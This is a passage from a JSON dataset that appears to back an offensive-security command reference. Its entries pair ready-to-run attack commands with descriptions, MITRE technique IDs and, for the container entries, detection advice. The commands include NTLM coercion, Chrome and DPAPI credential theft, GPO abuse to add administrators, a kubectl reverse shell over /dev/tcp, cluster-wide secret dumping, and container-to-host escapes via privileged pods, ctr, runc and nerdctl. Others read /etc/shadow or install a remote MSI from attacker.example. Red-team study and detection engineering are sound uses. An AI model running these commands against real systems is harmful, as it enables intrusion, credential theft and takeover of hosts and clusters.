privileges).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/WazeHell/sam-the-admin","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"added":true},{"id":"wadcoms:ShadowCoerce","toolId":"wadcoms:ShadowCoerce","toolName":"ShadowCoerce","name":"ShadowCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 shadowcoerce.py -d test.local -u john -p password123 10.10.10.2 10.10.10.1","description":"ShadowCoerce abuses the MS-FSRVP (File Server Remote VSS Protocol) RPC interface to coerce a target host into authenticating to an attacker-controlled listener. MS-FSRVP is exposed when the File Server VSS Agent Service feature is installed, so the vector is more situational than PrinterBug or PetitPotam, but it remained exploitable after some EFSRPC patches. The listener is supplied first and the target second, matching the PetitPotam-style argument order. Provide a valid domain account or NT hash.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/ShutdownRepo/ShadowCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-fsrvp"],"added":true},{"id":"wadcoms:SharpChrome-Logins","toolId":"wadcoms:SharpChrome","toolName":"SharpChrome","name":"SharpChrome-Logins","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"SharpChrome.exe logins /unprotect","description":"SharpChrome (part of the SharpDPAPI project) extracts Chromium-based browser secrets - saved logins, cookies, and credit cards - by resolving the browser's DPAPI-protected AES state key and decrypting the login database. The logins command with /unprotect uses the current user's DPAPI keys directly to reveal stored passwords in plaintext. Run it in the target user's session (or supply /pvk: with the domain backup key); it also supports /browser:edge and cookies output for session hijacking.\n\nCommand Reference:\n\n\tTarget browser: Chrome (current user profile)","mitre":["T1555.003"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/003/"],"added":true},{"id":"wadcoms:SharpDPAPI-Masterkeys-Credentials","toolId":"wadcoms:SharpDPAPI","toolName":"SharpDPAPI","name":"SharpDPAPI-Masterkeys-Credentials","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Decrypt the user's DPAPI masterkeys\nSharpDPAPI.exe masterkeys /password:password123\n\n# Decrypt Credential Manager blobs with the recovered masterkeys\nSharpDPAPI.exe credentials /mkfile:masterkeys.txt","description":"SharpDPAPI is a C# port of Mimikatz's DPAPI functionality for triaging Windows Data Protection API secrets. The masterkeys command decrypts the current user's DPAPI master keys (with /password: for their plaintext, or /pvk: with the domain backup key), writing a {GUID}:SHA1 lookup file. The credentials command then uses that /mkfile: to decrypt the user's Credential Manager blobs to plaintext. Run it from the user's own context or an elevated shell; it avoids dropping Mimikatz on disk.\n\nCommand Reference:\n\n\tPassword: password123\n\n\tMasterkey file: masterkeys.txt","mitre":["T1555.004"],"requires":["Shell","Password"],"services":["NTLM"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/"],"added":true},{"id":"wadcoms:SharpGPOAbuse-AddLocalAdmin","toolId":"wadcoms:SharpGPOAbuse","toolName":"SharpGPOAbuse","name":"SharpGPOAbuse-AddLocalAdmin","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Lateral Movement","Persistence"],"nativeCategory":["PrivEsc","Lateral Movement","Persistence"],"command":"SharpGPOAbuse.exe --AddLocalAdmin --UserAccount john --GPOName \"Vulnerable GPO\"","description":"SharpGPOAbuse abuses edit rights over a Group Policy Object to push malicious settings to every computer/user in the GPO's scope. --AddLocalAdmin injects a Restricted Groups / GptTmpl.inf entry that adds the specified account to the local Administrators group on all machines the GPO applies to. You must already have write access to the target GPO (found via PowerView's Get-DomainGPO ACLs); changes take effect at the next Group Policy refresh, so consider forcing gpupdate on target hosts.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget GPO: Vulnerable GPO","mitre":["T1484.001"],"requires":["Shell"],"services":["LDAP"],"references":["https://github.com/FSecureLABS/SharpGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"added":true},{"id":"wadcoms:SharpGPOAbuse-AddUserRights","toolId":"wadcoms:SharpGPOAbuse","toolName":"SharpGPOAbuse","name":"SharpGPOAbuse-AddUserRights","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"SharpGPOAbuse.exe --AddUserRights --UserRights \"SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight\" --UserAccount john --GPOName \"Vulnerable GPO\"","description":"SharpGPOAbuse --AddUserRights assigns Windows privileges / logon rights to an account through an editable GPO, writing them into the GPO's security template. Granting rights such as SeDebugPrivilege, SeTakeOwnershipPrivilege, or SeRemoteInteractiveLogonRight to a controlled user provides a durable escalation and remote-logon foothold across every host in scope. The --UserRights list is comma-separated and case-sensitive and must use the exact NT privilege constant names.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget GPO: Vulnerable GPO","mitre":["T1484.001"],"requires":["Shell"],"services":["LDAP"],"references":["https://github.com/FSecureLABS/SharpGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"added":true},{"id":"wadcoms:SharpView-Enumeration","toolId":"wadcoms:SharpView","toolName":"SharpView","name":"SharpView-Enumeration","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Kerberoastable accounts\nSharpView.exe Get-DomainUser -SPN\n# AS-REP roastable accounts\nSharpView.exe Get-DomainUser -PreauthNotRequired\n# Interesting ACLs with resolved GUIDs\nSharpView.exe Find-InterestingDomainAcl -ResolveGUIDs","description":"SharpView is a .NET/C# port of PowerView that exposes the same function names and parameters as a compiled executable, useful when PowerShell is locked down (Constrained Language Mode, AMSI/logging on script hosts) but arbitrary binaries still run. Each PowerView function becomes a positional first argument, and switches keep their PowerView names. It is handy for one-shot enumeration such as pulling kerberoastable accounts or interesting ACLs from a beacon.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["Shell"],"services":["LDAP"],"references":["https://github.com/tevora-threat/SharpView","https://github.com/PowerShellMafia/PowerSploit","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:SpoolSample-PrinterBug","toolId":"wadcoms:SpoolSample","toolName":"SpoolSample","name":"SpoolSample-PrinterBug","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"SpoolSample.exe 10.10.10.1 10.10.10.2","description":"SpoolSample.exe is the original Windows C# implementation of the PrinterBug (MS-RPRN) coercion technique. Run from an existing foothold on a domain-joined Windows host, it calls the print spooler's change-notification RPC on the target to force that target's machine account to authenticate back to a capture server, which is typically an ntlmrelayx or Responder listener. It is the on-host counterpart to printerbug.py and useful when operating entirely from a compromised Windows box under an existing user context. Requires the Print Spooler service to be running on the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tCapture Server IP: 10.10.10.2","mitre":[],"requires":["Shell"],"services":["RPC","NTLM"],"references":["https://github.com/leechristensen/SpoolSample","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"added":true},{"id":"wadcoms:SweetPotato-SeImpersonate","toolId":"wadcoms:SweetPotato","toolName":"SweetPotato","name":"SweetPotato-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# -e selects the coercion primitive (EfsRpc | DCOM | WinRM | PrintSpoofer | PetitPotam)\nSweetPotato.exe -p C:\\Windows\\System32\\cmd.exe -a \"/c whoami\" -e EfsRpc","description":"SweetPotato bundles several SYSTEM-coercion primitives (EfsRpc, DCOM/RoguePotato-style OXID, PrintSpoofer, PetitPotam, WinRM) behind one binary, selected with -e, so you can fall back to whichever named-pipe or DCOM coercion the host permits. It captures the coerced SYSTEM token and launches the program in -p with the arguments in -a. Handy on IIS/MSSQL service accounts when you want to try multiple potato techniques without swapping tools. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tExploit mode: EfsRpc","mitre":[],"requires":["Shell"],"services":["DCOM","RPC"],"references":["https://github.com/CCob/SweetPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true},{"id":"wadcoms:Whisker-ShadowCredentials","toolId":"wadcoms:Whisker","toolName":"Whisker","name":"Whisker-ShadowCredentials","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence","Credential Access"],"nativeCategory":["PrivEsc","Persistence","Credential Access"],"command":"# Add a shadow credential to the target and get the follow-up Rubeus command\nWhisker.exe add /target:victim /domain:test.local /dc:dc.test.local","description":"Whisker is a C# tool that manipulates the msDS-KeyCredentialLink attribute to perform the Shadow Credentials attack from a Windows host. `Whisker.exe add` generates a certificate, adds the corresponding key credential to the target object, and prints a ready-to-run Rubeus asktgt PKINIT command to authenticate as the victim and recover its NT hash. It requires GenericWrite/GenericAll over the target and a DC that supports PKINIT (an enterprise CA present). Stealthier than a password reset because the account's password is unchanged.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDomain Controller: dc.test.local\n\n\tTarget account: victim","mitre":[],"requires":["Shell"],"services":["LDAP","ADCS"],"references":["https://github.com/eladshamir/Whisker","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"added":true},{"id":"daemon:kubectl:0","toolId":"daemon:kubectl","toolName":"kubectl","name":"Execute","source":"DAEMON","platform":["Linux","Windows"],"capability":["Execution","Reverse/Bind Shell"],"nativeCategory":["Execute","Container Administration"],"command":"kubectl exec -it pod-x -n ns-x -- /bin/sh\nkubectl exec pod-x -n ns-x -- bash -c \"bash -i >& /dev/tcp/10.10.10.10/4444 0>&1\"","description":"Runs an arbitrary command inside an already-running pod through the Kubernetes API's pods/exec subresource, giving an interactive shell without deploying anything new. With a token that has the exec verb, an operator can pivot into any reachable workload and, as shown, spawn a reverse shell back to a listener.","usecase":"Interactively run commands or pop a shell inside an existing pod using only exec RBAC, avoiding creation of new objects.","mitre":["T1609"],"privilege":"user","detection":[{"type":"Detection","value":"Kubernetes API audit log create events on the pods/exec subresource (objectRef.subresource=exec). Alert on exec into production/system namespaces, exec by service-account identities that normally never exec, and exec commands spawning shells (sh, bash, /dev/tcp). Correlate with kubelet logs."}],"references":["https://attack.mitre.org/techniques/T1609/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_exec/"],"added":true,"verifyNote":"MITRE T1609 page explicitly names `kubectl exec` as a procedure; kubectl_exec generated docs confirm -it/-n/-- syntax. Binary absent from GTFOBins/LOLBAS/WADComs."},{"id":"daemon:kubectl:1","toolId":"daemon:kubectl","toolName":"kubectl","name":"Credential Access","source":"DAEMON","platform":["Linux"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access"],"command":"kubectl get secrets --all-namespaces -o json\nkubectl get secret secret-x -n ns-x -o jsonpath='{.data.token}' | base64 -d","description":"Lists Kubernetes Secret objects and dumps their contents. Secret data is only base64-encoded in the API, so a single get/list on the secrets resource returns service-account tokens, registry pull creds, TLS keys and app passwords in recoverable form. --all-namespaces harvests every namespace the identity can read.","usecase":"Harvest tokens, cloud keys and passwords cluster-wide from the API when the compromised identity holds get/list on secrets.","mitre":["T1552.007"],"privilege":"user","detection":[{"type":"Detection","value":"Enable RequestResponse-level audit on the secrets resource. Alert on list/get across many namespaces or all-namespaces, especially from service accounts. Red Canary Atomic T1552.007 mirrors this. Watch /api/v1/secrets and /api/v1/namespaces/*/secrets GET/LIST spikes."}],"references":["https://attack.mitre.org/techniques/T1552/007/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md","https://kubernetes.io/docs/concepts/configuration/secret/"],"added":true,"verifyNote":"MITRE T1552.007 (Container API) description explicitly covers using the Kubernetes API to retrieve Secrets; Red Canary Atomic T1552.007 replicates `kubectl get secrets`. Secrets are base64, not encrypted (k8s Secret docs)."},{"id":"daemon:kubectl:2","toolId":"daemon:kubectl","toolName":"kubectl","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["Escape to Host","Deploy Container"],"command":"kubectl run pod-x -n ns-x --restart=Never -it --rm --image=alpine --overrides='{\"spec\":{\"hostPID\":true,\"containers\":[{\"name\":\"c\",\"image\":\"alpine\",\"stdin\":true,\"tty\":true,\"command\":[\"/bin/sh\"],\"securityContext\":{\"privileged\":true},\"volumeMounts\":[{\"name\":\"host\",\"mountPath\":\"/host\"}]}],\"volumes\":[{\"name\":\"host\",\"hostPath\":{\"path\":\"/\"}}]}}'\n# then inside: chroot /host sh","description":"Uses the --overrides flag of kubectl run to inject a raw pod spec that is privileged, shares the host PID namespace and mounts the node root filesystem via a hostPath volume. Once scheduled, chroot /host yields a root shell on the underlying node, escaping the cluster's isolation boundary.","usecase":"Escape from cluster tenant to full node root when the identity can create pods with privileged/hostPath specs (no PodSecurity restricted).","mitre":["T1611","T1610"],"privilege":"user","detection":[{"type":"Detection","value":"Audit pods/create where securityContext.privileged=true, hostPID/hostNetwork/hostIPC=true, or volumes[].hostPath is set (especially path /). Enforce Pod Security Admission 'restricted' or an admission controller (OPA/Kyverno) to block these specs and alert on rejections."}],"references":["https://attack.mitre.org/techniques/T1611/","https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html"],"added":true,"verifyNote":"`--overrides` is a documented kubectl run flag (inline JSON merged into the generated object); kubernetes/kubectl#721 and HackTricks document it as the privileged/hostPath escape workaround. T1611 (Escape to Host)+T1610 (Deploy Container) correct."},{"id":"daemon:kubectl:3","toolId":"daemon:kubectl","toolName":"kubectl","name":"Node Access","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","File Read"],"nativeCategory":["Node Access","Escape to Host"],"command":"kubectl debug node/node-x -it --image=alpine --profile=sysadmin\n# then inside the debug pod: chroot /host sh","description":"kubectl debug node creates a debugging pod that runs in the target node's host namespaces with the node root filesystem mounted at /host. Combined with --profile=sysadmin (privileged) and chroot /host it provides root-level access to the node's disk and processes, a supported feature repurposed for host takeover.","usecase":"Obtain node filesystem/root access through the sanctioned node-debug path when create-pods on nodes is permitted.","mitre":["T1611"],"privilege":"user","detection":[{"type":"Detection","value":"Audit for pod create with names matching node-debugger-* and node-scoped debug pods carrying host namespaces or --profile=sysadmin. Alert on debug pods mounting /host or running chroot. Restrict the node/debug capability via RBAC."}],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/kubectl-node-debug/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_debug/"],"added":true,"verifyNote":"kubernetes.io 'Debugging Kubernetes Nodes With Kubectl' page (fetched live) confirms node root mounts at /host, that plain debug is not privileged so chroot /host fails unless `--profile=sysadmin` is used; T1611. Both refs live."},{"id":"daemon:kubectl:4","toolId":"daemon:kubectl","toolName":"kubectl","name":"File Copy","source":"DAEMON","platform":["Linux","Windows"],"capability":["File Copy","Collection"],"nativeCategory":["File Copy","Collection"],"command":"kubectl cp ns-x/pod-x:/etc/passwd /tmp/x\nkubectl cp /tmp/x ns-x/pod-x:/tmp/x","description":"Copies files and directories out of or into a pod. Under the hood kubectl cp streams a tar archive through the pods/exec subresource (the container image must contain tar), so it doubles as a data-exfiltration and tool-staging channel that only needs exec permission.","usecase":"Pull sensitive files out of a pod or stage attacker tooling into it using nothing but exec/cp rights.","mitre":["T1609"],"privilege":"user","detection":[{"type":"Detection","value":"cp rides pods/exec, so audit exec create events invoking tar (command contains 'tar -cf -' or 'tar -xmf -'). Alert on exec+tar into/out of sensitive workloads and on large streamed transfers correlated with exec sessions."}],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_cp/","https://attack.mitre.org/techniques/T1609/"],"added":true,"verifyNote":"kubectl_cp generated docs confirm cp streams a tar via the exec subresource and requires tar in the container image; T1609 justified because cp executes tar in-container. Absent from GTFOBins/LOLBAS."},{"id":"daemon:kubectl:5","toolId":"daemon:kubectl","toolName":"kubectl","name":"Discovery","source":"DAEMON","platform":["Linux"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"kubectl auth can-i --list\nkubectl auth can-i create pods -n ns-x\nkubectl auth can-i --list --as=system:serviceaccount:ns-x:sa-x","description":"Queries the RBAC authorizer (SelfSubjectRulesReview / SelfSubjectAccessReview) to enumerate exactly which resources and verbs the current identity is allowed. --list dumps the full permission matrix; --as combines with impersonation rights to map another subject's power without using its credentials.","usecase":"Enumerate the compromised token's RBAC reach (and plan escalation) before taking any noisy action.","mitre":["T1069"],"privilege":"user","detection":[{"type":"Detection","value":"Audit create events on selfsubjectrulesreviews / selfsubjectaccessreviews (a public Sigma rule flags RBAC permission listing). A burst of can-i / --list right after a new token appears is a strong recon signal; alert on impersonation (--as) combined with these reviews."}],"references":["https://kubernetes.io/docs/reference/access-authn-authz/authorization/#checking-api-access","https://detection.fyi/sigmahq/sigma/application/kubernetes/audit/kubernetes_audit_rbac_permisions_listing/"],"added":true,"verifyNote":"can-i --list uses SelfSubjectRulesReview (k8s authz docs, 'Checking API access'); detection.fyi Sigma rule 'RBAC Permission Enumeration Attempt' fetched live (it tags T1069.003/T1087.004 — parent T1069 retained as correct)."},{"id":"daemon:kubectl:6","toolId":"daemon:kubectl","toolName":"kubectl","name":"Lateral Movement","source":"DAEMON","platform":["Linux"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement","Proxy"],"command":"kubectl port-forward svc/svc-x -n ns-x 8080:80\nkubectl port-forward --address 0.0.0.0 pod-x -n ns-x 8080:8080","description":"Opens a tunnel from the operator's machine, through the API server and kubelet, to a port on a pod or service via the pods/portforward subresource. This reaches ClusterIP-only services (databases, internal admin UIs, dashboards) that are otherwise unroutable, and --address 0.0.0.0 can expose the tunnel to other hosts.","usecase":"Reach cluster-internal services (DBs, dashboards, metadata proxies) from outside without deploying a pod.","mitre":["T1090.001"],"privilege":"user","detection":[{"type":"Detection","value":"Audit create on the pods/portforward subresource (objectRef.subresource=portforward). Alert on port-forward to sensitive services (etcd, databases, dashboards), long-lived forwards, and --address bindings other than localhost."}],"references":["https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#port-forward","https://attack.mitre.org/techniques/T1090/001/"],"added":true,"verifyNote":"Command real: `kubectl port-forward` with the pods/portforward subresource and the `--address` flag are documented in kubectl docs. FIX: MITRE changed T1609->T1090.001 (Internal Proxy) and reference swapped accordingly — T1609 is defined as executing commands within a container, which port-forward does not do; it establishes a proxy tunnel to internal services."},{"id":"daemon:kubectl:7","toolId":"daemon:kubectl","toolName":"kubectl","name":"Credential Access","source":"DAEMON","platform":["Linux"],"capability":["Credential Access"],"nativeCategory":["Credential Access","Token Request"],"command":"kubectl create token sa-x -n ns-x --duration=999999h","description":"Requests a bound service-account token through the TokenRequest API. An identity that can create serviceaccounts/token for a more-privileged service account can mint a fresh bearer token for it and assume its permissions, with --duration pushing the expiry far out.","usecase":"Mint a valid bearer token for a higher-privileged service account to escalate or persist.","mitre":["T1528"],"privilege":"user","detection":[{"type":"Detection","value":"Audit create on the serviceaccounts/token subresource (TokenRequest). Alert when a subject requests tokens for service accounts it does not own, on unusually long --duration / requested expirationSeconds, and on token requests for privileged SAs (e.g. cluster-admin-bound)."}],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_create/kubectl_create_token/","https://attack.mitre.org/techniques/T1528/"],"added":true,"verifyNote":"kubectl_create_token generated docs confirm `create token` is backed by the TokenRequest API and that `--duration` sets the requested token lifetime; T1528 (Steal Application Access Token) fits assuming a higher-priv SA. Server may cap very long durations, but the flag is real."},{"id":"daemon:kubectl:8","toolId":"daemon:kubectl","toolName":"kubectl","name":"Discovery","source":"DAEMON","platform":["Linux","Windows"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"kubectl get pods -A -o wide\nkubectl get nodes -o wide\nkubectl get all -A -o yaml","description":"Enumerates cluster resources: pods and their node placement/IPs, nodes and addresses, and full object manifests. -o yaml exposes environment variables, mounted volumes, image references and annotations that frequently leak credentials and reveal the escape/lateral-movement surface.","usecase":"Map workloads, nodes and embedded config/secrets to plan lateral movement and host escape.","mitre":["T1613"],"privilege":"user","detection":[{"type":"Detection","value":"Audit high-volume list/get across pods, nodes and other resources (especially -A / cluster-scoped) from a single identity in a short window. Baseline normal read patterns per service account and alert on broad enumeration by identities that usually touch one namespace."}],"references":["https://attack.mitre.org/techniques/T1613/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_get/"],"added":true,"verifyNote":"kubectl_get generated docs confirm -A/--all-namespaces, -o wide and -o yaml; T1613 (Container and Resource Discovery) is the correct technique for cluster resource enumeration."},{"id":"daemon:crictl:9","toolId":"daemon:crictl","toolName":"crictl","name":"Execute","source":"DAEMON","platform":["Linux"],"capability":["Execution"],"nativeCategory":["Execute","Container Administration"],"command":"crictl ps\ncrictl exec -it CONTAINERID sh","description":"crictl is the CRI debugging CLI that talks directly to the node's container runtime (containerd/CRI-O) socket, bypassing the API server and kubelet policy entirely. From a compromised node, crictl ps lists running containers and crictl exec drops an interactive shell into any of them, including other tenants' workloads.","usecase":"On a node, execute into any running container out-of-band of the Kubernetes API and its RBAC/audit.","mitre":["T1609"],"privilege":"admin","detection":[{"type":"Detection","value":"Node-level process/auditd monitoring: exec of crictl (and containerd-shim/runc exec children) not originating from kubelet. These actions bypass API audit, so rely on host EDR and file/socket access to /run/containerd/containerd.sock or /var/run/crio/crio.sock."}],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/crictl/","https://attack.mitre.org/techniques/T1609/"],"added":true,"verifyNote":"kubernetes.io crictl debug docs and cri-tools confirm `crictl ps` and `crictl exec -it`; crictl speaks directly to the CRI socket, bypassing apiserver/RBAC/audit. Not a GTFOBins/LOLBAS binary; T1609."},{"id":"daemon:crictl:10","toolId":"daemon:crictl","toolName":"crictl","name":"Credential Access","source":"DAEMON","platform":["Linux"],"capability":["Credential Access","Discovery"],"nativeCategory":["Credential Access","Discovery"],"command":"crictl ps -a\ncrictl inspect CONTAINERID","description":"crictl inspect returns a container's full CRI status JSON including its environment variables, command line, mounts and labels. Applications commonly pass secrets (DB passwords, API keys, tokens) as env vars, so inspecting containers on a node reveals those plaintext values without touching Kubernetes Secret objects or the API server.","usecase":"Read plaintext env-var secrets and mount layout of colocated containers straight from the node runtime.","mitre":["T1552.007","T1613"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for crictl inspect / inspectp / inspecti invocations on nodes outside of sanctioned tooling, and for reads of the containerd/CRI-O socket. Prefer mounting secrets as files with restrictive modes over env vars to shrink this exposure."}],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/crictl/","https://attack.mitre.org/techniques/T1552/007/"],"added":true,"verifyNote":"cri-tools/crictl docs confirm `crictl inspect` returns container status JSON incl. env vars (and inspectp/inspecti variants exist); reading runtime-held env secrets fits T1552.007 (Container API) + T1613 discovery."},{"id":"daemon:ctr:11","toolId":"daemon:ctr","toolName":"ctr","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["Escape to Host","Bind Mount Escape"],"command":"ctr image pull {REMOTEURL}/ubuntu:latest\nctr run --privileged --net-host -t {REMOTEURL}/ubuntu:latest esc bash\nctr run --mount type=bind,src=/,dst=/host,options=rbind:rw -t {REMOTEURL}/ubuntu:latest esc chroot /host bash","description":"ctr is containerd's low-level admin client. With access to the containerd socket an operator can pull an image and launch a container with --privileged/--net-host, or bind-mount the node root (src=/) into the container; chroot /host then yields a root shell on the node. It bypasses the kube-apiserver and any admission control.","usecase":"Turn containerd socket access on a node into node root via a privileged or host-bind-mount container.","mitre":["T1611"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for ctr invocations carrying --privileged, --net-host, or --mount type=bind,src=/ , and for access to /run/containerd/containerd.sock by non-kubelet processes. New containerd tasks from unexpected images/registries on a node are high-signal."}],"references":["https://hacktricks.wiki/en/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.html","https://attack.mitre.org/techniques/T1611/"],"added":true,"verifyNote":"HackTricks containerd-ctr page confirms the exact `ctr run --privileged --net-host` and `ctr run --mount type=bind,src=/,dst=/...` host-mount escapes; ctr is not a GTFOBins binary; T1611. (options=rbind:rw is a benign superset of the documented options=rbind.)"},{"id":"daemon:runc:12","toolId":"daemon:runc","toolName":"runc","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["Escape to Host","Bind Mount Escape"],"command":"runc spec\n# edit config.json mounts: {\"type\":\"bind\",\"source\":\"/\",\"destination\":\"/\",\"options\":[\"rbind\",\"rw\",\"rprivate\"]}\nmkdir rootfs\nrunc run esc","description":"runc is the OCI runtime under Docker/containerd/CRI-O. Where runc is available with root, an operator can generate an OCI bundle with runc spec, edit config.json to bind-mount the host root (source \"/\") into the container, and runc run it, producing a container whose filesystem is the node's, granting full host access outside any orchestration policy.","usecase":"Spawn an OCI container that bind-mounts the host root to reach node root when runc is runnable as root.","mitre":["T1611"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for runc spec and runc run invocations that are not children of containerd-shim/dockerd (i.e. manual bundles), and for config.json files whose mounts bind source \"/\". Flag new OCI bundle directories written to disk followed by runc run."}],"references":["https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation","https://attack.mitre.org/techniques/T1611/"],"added":true,"verifyNote":"HackTricks runc page confirms `runc spec` -> edit config.json to bind-mount source '/' -> `runc run`; also confirms runc must run as root (privilege=admin). T1611; runc is not a GTFOBins binary."},{"id":"daemon:docker:13","toolId":"daemon:docker","toolName":"docker","name":"Collection","source":"DAEMON","platform":["Linux"],"capability":["Collection","File Read"],"nativeCategory":["Collection","Data Staging"],"command":"docker cp CONTAINERID:/etc/shadow /tmp/x\ndocker export CONTAINERID -o /tmp/x.tar\ndocker save IMAGE:latest -o /tmp/x.tar","description":"With Docker daemon access, docker cp pulls individual files out of any container's filesystem, docker export writes a tar snapshot of a container's whole filesystem, and docker save archives full images (all layers/history). Together they let an operator harvest other containers' files, embedded secrets and build-time credentials from a single node.","usecase":"Collect files, filesystem snapshots and image layers (with baked-in secrets) from colocated containers.","mitre":["T1005"],"privilege":"admin","detection":[{"type":"Detection","value":"docker events for export/save/cp actions and auditd for large tar writes by dockerd; flag export/save of containers or images the user did not create, and cp reads of sensitive paths (/etc/shadow, mounted secret volumes). Baseline legitimate backup jobs to reduce noise."}],"references":["https://docs.docker.com/reference/cli/docker/container/export/","https://docs.docker.com/reference/cli/docker/image/save/","https://attack.mitre.org/techniques/T1005/"],"added":true,"verifyNote":"docker export/save/cp CLI docs confirm the commands and -o/--output (export page fetched live). Criterion (e) caveat: `docker cp` overlaps the existing GTFOBins docker File-read/File-write functions, but `docker export`/`docker save` (whole-filesystem and whole-image tar for bulk collection, T1005) are additive and absent from GTFOBins — kept for that additive value."},{"id":"daemon:nerdctl:14","toolId":"daemon:nerdctl","toolName":"nerdctl","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["Escape to Host","Bind Mount Escape"],"command":"nerdctl run --privileged --rm -it -v /:/host alpine chroot /host sh","description":"nerdctl is the Docker-compatible CLI for containerd and accepts docker run flags. On a node with containerd, an operator can run a --privileged container that bind-mounts the host root (-v /:/host) and chroot /host to obtain node root, the same host-mount escape as docker/ctr but through the nerdctl front-end.","usecase":"Escape to node root via containerd using familiar docker-style --privileged and host-mount flags.","mitre":["T1611"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for nerdctl invocations with --privileged or -v /:/ (host-root bind) and for new containerd tasks not launched by kubelet. Restrict access to the containerd socket and to the nerdctl binary; alert on chroot into a host-root mount inside a container."}],"references":["https://github.com/containerd/nerdctl/blob/main/docs/command-reference.md","https://attack.mitre.org/techniques/T1611/"],"added":true,"verifyNote":"nerdctl command-reference confirms Docker-compatible `--privileged` and `-v` bind mounts; same host-mount escape as docker but nerdctl is NOT a GTFOBins/LOLBAS binary, so the entry is additive; T1611."},{"id":"daemon:msiexec:15","toolId":"daemon:msiexec","toolName":"msiexec.exe","name":"Execute","source":"DAEMON","platform":["Windows"],"capability":["Execution","AWL / Policy Bypass"],"nativeCategory":["Execute"],"command":"msiexec /q /i https://attacker.example/x.msi","description":"The signed Windows Installer fetches and silently installs a remote MSI; the package's custom actions run arbitrary code under the trusted msiexec host. A signed vendor MSI can also be paired with a malicious remote transform: msiexec /i C:\\Windows\\Temp\\x.msi TRANSFORMS=\"https://attacker.example/x.mst\" /qb.","usecase":"Proxy execution of attacker code through a trusted, signed installer, including from a remote 